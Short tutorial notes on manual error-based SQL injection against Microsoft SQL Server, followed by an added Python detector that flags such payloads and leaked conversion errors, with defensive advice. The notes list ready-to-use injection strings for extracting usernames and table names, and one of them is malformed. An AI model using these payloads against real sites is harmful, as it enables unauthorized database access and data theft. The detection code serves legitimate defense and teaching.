Learning together with friends goes fast. Thank you for the treasure of youth.
Many write-ups on the internet about manual MSSQL error-based injection are long-winded. In fact, the principle fits in one short snippet, as follows:
' and (query that returns a piece of content)=1 and 'c'='c
The query returns a value of type nvarchar. Because it is compared with the integer 1, SQL Server implicitly converts it to int, and that conversion is bound to fail. The error message then displays the nvarchar value, that is, the result of the query.
A single-field query is derived from this principle. As follows:
' and 0=(select top 1 username from table) and 'c'='c
Then there is a multi-field query derived from it. As follows:
' and 0=(select top username from table for xml path('')) and 'c'='c
Finally, using MSSQL's built-in system tables and functions, you can write the following:
' and 1=(select quotename(name) from database_name..sysobjects where xtype='U' for xml path('')) and 'c'='c
If you cannot understand the SQL statements, please look them up on Baidu.
If there are any mistakes, corrections are welcome.
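From the defender's side, the conversion error described above is what to look for in responses, and the integer-versus-subquery comparison and FOR XML PATH are what to look for in request parameters. The following detector is an added example, not part of the original notes; the sample requests and responses are constructed, and `table`, `username` and `alice` are placeholder values.

```python
import re
from urllib.parse import unquote_plus

# SQL Server conversion error (Msg 245; older wording included). The quoted
# value is whatever the injected subquery returned.
CONVERSION_ERROR = re.compile(
    r"(?:Conversion failed when converting|Syntax error converting) the "
    r"n?varchar value '(?P<leak>.*?)' to (?:a column of )?data type int",
    re.IGNORECASE | re.DOTALL)
# Request shapes from the notes: an integer compared with a subquery, FOR XML PATH.
SUBQUERY_COMPARE = re.compile(
    r"\d+\s*=\s*\(\s*select\b|\(\s*select\b[^)]*\)\s*=\s*\d+", re.IGNORECASE)
XML_PATH = re.compile(r"\bfor\s+xml\s+path\b", re.IGNORECASE)

def inspect(query_string, response_body):
    """Return a finding for one request/response pair, or None if clean."""
    decoded = unquote_plus(query_string)
    reasons = []
    if SUBQUERY_COMPARE.search(decoded):
        reasons.append("integer compared with subquery")
    if XML_PATH.search(decoded):
        reasons.append("FOR XML PATH in parameter")
    leak = CONVERSION_ERROR.search(response_body)
    if leak:
        reasons.append("conversion error returned to client")
    if not reasons:
        return None
    return {"reasons": reasons,
            "leaked": leak.group("leak") if leak else None,
            "severity": "high" if leak else "medium"}

# Constructed samples: (query string, response body).
PAYLOAD = "name=x%27+and+0%3D%28select+top+1+username+from+table%29+and+%27c%27%3D%27c"
SAMPLES = [
    ("id=7", "<html>ok</html>"),
    (PAYLOAD, "Conversion failed when converting the nvarchar value 'alice' "
              "to data type int."),
    (PAYLOAD, "<html>Something went wrong.</html>"),  # detailed errors disabled
]

def scan(samples):
    """Inspect every (query string, response body) pair in order."""
    return [inspect(q, body) for q, body in samples]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

The third sample shows the effect of returning a generic error page: the attempt is still visible in the request, but no value reaches the client. Parameterized queries remove the injection point itself.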
Learning notes: manual MSSQL error-based injection